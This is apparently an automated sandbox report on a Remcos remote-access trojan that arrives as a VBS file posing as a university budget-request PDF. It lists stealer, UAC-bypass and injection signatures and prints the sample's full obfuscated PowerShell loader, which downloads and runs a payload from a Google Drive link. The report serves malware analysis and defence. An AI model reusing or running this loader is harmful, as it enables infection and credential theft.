Malware Analysis Report

2024-12-01 03:06

Sample ID 241111-h4t6jsvkbv
Target 11112024_0717_PERMINTAAN ANGGARAN (Universitas IPB) ID177888_pdf.vbs.zip
SHA256 d7ea8908f53391d47f6ecf1e6bb8b30d03b0abb4c77f688d03920ceeeda66812
Tags
remcos remotehost collection credential_access discovery evasion rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d7ea8908f53391d47f6ecf1e6bb8b30d03b0abb4c77f688d03920ceeeda66812

Threat Level: Known bad

The file 11112024_0717_PERMINTAAN ANGGARAN (Universitas IPB) ID177888_pdf.vbs.zip was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection credential_access discovery evasion rat stealer trojan

Remcos family

Remcos

UAC bypass

NirSoft MailPassView

NirSoft WebBrowserPassView

Detected Nirsoft tools

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Enumerates system info in registry

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 07:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 07:17

Reported

2024-11-11 07:22

Platform

win7-20240708-en

Max time kernel

122s

Max time network

123s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sybotic Fladorme Ribbefri Sawpit #><#Twangling Heltidsbeskftigendes Underkaste Ejerstrukturen undladelsessynders Shufty #>$Saltekarrene='reflip';function Yoick($Glyphs){If ($host.DebuggerEnabled) {$Sekteriker++;$Sithement=$Glyphs.'Length' - $Sekteriker} for ( $swiveling=4;$swiveling -lt $Sithement;$swiveling+=5){$Rorke=$swiveling;$Reglers+=$Glyphs[$swiveling]}$Reglers}function Narrestregen($Beat){ .($projiceret) ($Beat)}$Konsumeringernes=Yoick ' awmnMis e Libt Sog.Asp WCande VagbTrk cThymLdemai SikEFin N ,ikt esk ';$Stilmblerne=Yoick 'AfstMBrano DepzF reiFr nlSemil unka .kt/Demn ';$Tsiology=Yoick 'C emTStanl SolsMyel1Nodd2A gr ';$Kontraktioners='Trop[ TruNOldfE istTgen .Cy rS BlaEZar rOpegvSysti itcCE.soeSynsPSypioI iti mpeNbndeTgregMFejla Vikn artADa rGVkkee Aflrslat]Olie:E tr:In eS Slae ammcTil.UFelwrTar IprovT StaySnylpBattRRoseoStafTMarioAut CTr kO ramlDisk=,usp$tar TU,diSHy,rIRui oB hrL nteo .msg N.nYTalo ';$Stilmblerne+=Yoick 'Majo5 Bar. Reg0 Com Ins( orWOrdiiPartn etedBredoCarow upesUncr GrapNFresTShun .rim1 Pe,0Wayl.sko 0Nazi; nte TelW GuriPalenrung6Lvfa4Vago; Rem Ihsx usp6Work4Sags; eca RedrrUn qv ver: ig1sire3 ou 1S it.Udle0 ros) Hje nbuGLoreeElekcunfaksk toUne /supe2Sulp0Pulm1L.uc0 S.u0 Kim1s,is0 Den1Glut BrneFa,paiMinorInteeSkolfPanlo C,pxBayr/Vift1 erf3Soft1Comp.tric0Hove ';$Bedazement=Yoick 'Ski,US alsGammEParkrJean-Re kaTaoiG BageUnpon eciTNrre ';$Amoralitetens112=Yoick ' hi.hAtomtShartB ugpNikksKltr:Tr.q/forg/Yok,d ritrScati MorvAfgreDeba.Sl mgKrusoBankoResigAdral Cr,eNonv.aflyc OpfoEftemBein/Justu LsecRac ?Fad e.hrexbiblpGrino ommrSocitGnav=Snond Oato IndwBetenHyb l UnpoBracaD tadSvrm&ParliKnopdBehn=Cant1 husGmanaY op V UklwE brA De ZbrevePol _ Nask Mav3IndsHrecoh Fu X H.soHynet Lov-TilfX.ikkTTffeFAntiVUdspa JulaCoulE.usch Va 9 LeaUS reUUninqVrdii.aryJ.idrHGablY tox ';$Vulvocrural=Yoick 'Bye >Exta ';$projiceret=Yoick 'IrroI SolEUdgaXS od ';$Spanierne='betydningslren';$swivelingnsipient='\Borgerrettighed.Pol';Narrestregen (Yoick 'Alky$TilkG RadLTr kO L.pbDataABushlSt l:TorrmBortYnormO de pPreerBarrOhalvTBirte C liM.sonSurg=oppu$Nun eR dunBobrVBlas:CoadasdumPNumep uledtmmeACroqTSte a ,nd+Bram$BallSsi.kW.icriIntevPulwENdr lLup IEatan AdvgOpern SskST,wei engPTidsIBi,teUnbuN Afnta is ');Narrestregen (Yoick ' Cha$ MargBag Lt stoMaribMercAStilL B,d:For.SHor.aFr,eLUlt gAr esL,vicShimHMo,ea Sp uM.ndFTankFSarkrPlir5upca3Izaf=.one$ArmeaPendMTtnioCarbrH arALng lS rdiRiddt.onfETrutT RecEMetrNTr.msEndt1Pala1Poly2Evil.IrresMo op Un lLirkIEchotFeml(Syst$UdskVNaa uN,npl icvImbuO.pstCDwarrkonsu FasrD.avABekrlhawa),ord ');Narrestregen (Yoick $Kontraktioners);$Amoralitetens112=$Salgschauffr53[0];$Skandale130=(Yoick 'Co,n$dio gibinlCykeODoteB DedAK plL ,em:giolSUfo k ProiAnaxLPer L Hume unVUddegskrmSSelvfTablLBefiyHaantFortnAffai Po ND.aegOligSA le=AvlenLegae.arnwprea-StrioGastbAlitjVandE Ai cBoliT Try BesS CuryAcmaSAnveTUhareUnmem Aft.bogs$PuiskLataOThewN kaSbygguOphom Al E rchRUd eICur NNonaGAarmeTrearde,aNWildeLvsaSpreo ');Narrestregen ($Skandale130);Narrestregen (Yoick 'Lisc$ SveS GrukHe.iiIn alGstel NoneAff vLym gTingsDem fSkrilPi.ayForstBesknB,ggiApornaagegjungsA ie.WielH ArveCapraAjledAbnoeMaskrOpbysMoon[Fe.h$ nteBMor.eT akdVulcaDevozV lgeF rlmdk ieCo sn.ecttnar ]Usn = Pyr$PangSBenetAffei ndsl,nfrm Moob tillEftee BogrSlvknKulle Br ');$Paramastigate=Yoick 'Snyd$PostSDetekS.bciDepalRe sl CiteOvervPr,vgDe,es JowfG rdlJoggyJ but ParnJageiRenunResigUni sUn a.T.enD.ynooVentwSulfnUndelUlovo GuaahunddPortFSor.iTherlsagteR.ms(Chon$El cA intm ovso arir nstaEksplSk.giUgant UnceDr ftSnedeSammn .eys Ra.1Styr1,arg2,lbe, Scr$Fo lJ StruEnt mLnfobAutol tile,jord Rek4 ebr1Sild)Udsk ';$Jumbled41=$Myoprotein;Narrestregen (Yoick 'R,su$Om,gGS,vsL aaOEpigB GalASymbL Slu: P tVHalsrRab I GamGPelt= Bla(ForsT Re eR,nmSSapoTOver-BaklPMidnaMisltAmbiHOp f Macr$Ol gJS avUForkmu.soBIndtL idE PreDH,ar4 Baj1 Cni) ver ');while (!$vrig) {Narrestregen (Yoick 'C,ar$KopigGy,nl Fiso Gi bAstea Ve,l Dea:Ban A TjabTravs renvMaglo MislL,antmin =Thor$Anubtnon r eruAutoe,las ') ;Narrestregen $Paramastigate;Narrestregen (Yoick ',illsGeneTAkhla IntRMisitCyto- bersGeofLarreePho eFor.PBr.s Stam4Midd ');Narrestregen (Yoick 'Spe $ nfuGOu dlMornoPreoBIm aa CyklHomm: IsbvScenrVerdiFascg,ens=Gest( DektCo.pEneigSLamptpigg-GoutPm.isATeleT.rbah ,uk Redi$ FrujPol.uvalgmBon BFi eL DiveOverdTi g4Cons1Elec) Pr ') ;Narrestregen (Yoick ' Phr$ SevgFodbl,agtoSnakbUde ABrnelNatt:Rou mImboORollDS,amu Zanl .reAP otTLandIMurrOTaroNBu h=.dvi$ ArsGSweeL Ku.OUnrub XreaOmkrlGall:FortD ndeEBrempalc.H PlaLN,diO,uliG OveITandS lot inniTittc soma omnT MusEmilj+Vedf+Patr%Tidm$ParaS Ch aBo.tlKikkGRedasTykscI.teh ndeA MaiUcataFPo sfVagor ig5 ont3Drif.m,lmCLiceoBeviUIntenGerbtFor ') ;$Amoralitetens112=$Salgschauffr53[$Modulation]}$Hvervenes=280926;$Korrespondens=30345;Narrestregen (Yoick '.amu$IberG .nfLUdenoLevebReasAfierLNaes:UnplFEquaoTarpRparaTJereROutbnThunElapnL Stes SvieRundRBldg Marv= M s ConfGantie UnstLebe- EyeC oleo TubnKnigTCan eMa znFor tDhan Prop$RuneJWateUmundM ekaBBruglRem.eNe eD.eho4Me a1Tryk ');Narrestregen (Yoick 'Reli$NonegRep lOranoMantbfaxeaReaslSoli:HoveKRegloWeisgDriva Ce lUndvsProskMoonaProbb ,etsTegn und =Ubev Pers[ Ve SmiscyCym sForstReocePaenm and.LambC WanoUndenAnalvHusleVibrr UnrtProg]mask:Dewb:KlieFJaycrDecaoSkjomSt nBLi eaPerss Xyle Lon6El e4Co.uSStoltInelroveri Snun AdvgIndt(Ante$A,owfMytoo plarSpeetRea.rForenP treReallPhocsJi se blorKoka)Micr ');Narrestregen (Yoick ' .un$ImmuG raLGgetoHy.rBOmbuA Vr l est: Oves T do Pe nUndegPosisSamkT ElaRImpreBranSSkibsSupeeU baS ao1 Ep 6B ff5Hamm Kr k=Lind Para[VrdisRelaYRe.asSeruTUrinEAfspmSty..DititAntiE ,ncxza iT ,ae.TherE ycanBereCFrgeoS uddDecriBe yn TeaGAnbe]Legi:Zina:Be.yA RaaS l.uCCellIS eei Sut.RoseGLaudeStrmtLrerSBaryT SamRS.kuIforfNOverGObse(Gen,$U.isKChecOUroegExpuA yralOrk S VenkA,anASpigB Carsno i) hir ');Narrestregen (Yoick 'Ophr$LitagMultLNomioSledbKubiAc urLColu: Ge mAnt eActiSOto,sErikeJupiNTrus= Fly$Spr SNiseOPer NDenaGUhanSBladtFuldRFl ve.ebisAf vSChinE SlysOutb1St r6,eni5s ba. ifns HeduStowBBjrnS RoutJulerInfoI BlonAutoG Res( V d$ andH alaVPdqae.ollRRapsVB llEA,niNm,gneDe esSkra,Une $Ri pkKle OAtomrHumiRNonfED.mmS EndPKommo.vern SkrdNordEbarnnAn,iSU,ti)Pycn ');Narrestregen $Messen;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabB260.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/872-20-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

memory/872-21-0x000000001B800000-0x000000001BAE2000-memory.dmp

memory/872-22-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-25-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-24-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-23-0x0000000000680000-0x0000000000688000-memory.dmp

memory/872-26-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-27-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-28-0x000007FEF664E000-0x000007FEF664F000-memory.dmp

memory/872-29-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-30-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-31-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-32-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

memory/872-33-0x000007FEF6390000-0x000007FEF6D2D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 07:17

Reported

2024-11-11 07:22

Platform

win10v2004-20241007-en

Max time kernel

297s

Max time network

280s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PERMINTAAN ANGGARAN (Universitas IPB) ID177888·pdf.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2024 set thread context of 2524 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 set thread context of 1416 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 set thread context of 4664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1052 wrote to memory of 964 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1052 wrote to memory of 964 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 536 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 536 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 536 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 536 wrote to memory of 2024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1332 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1332 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 2024 wrote to memory of 1332 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 1332 wrote to memory of 4032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1332 wrote to memory of 4032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1332 wrote to memory of 4032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2024 wrote to memory of 1868 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2024 wrote to memory of 1868 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 4236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 4236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2024 wrote to memory of 2524 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 2524 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 2524 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 2524 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1440 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1440 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1440 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1416 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1416 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1416 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 1416 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 4664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 4664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 4664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2024 wrote to memory of 4664 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1868 wrote to memory of 3532 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
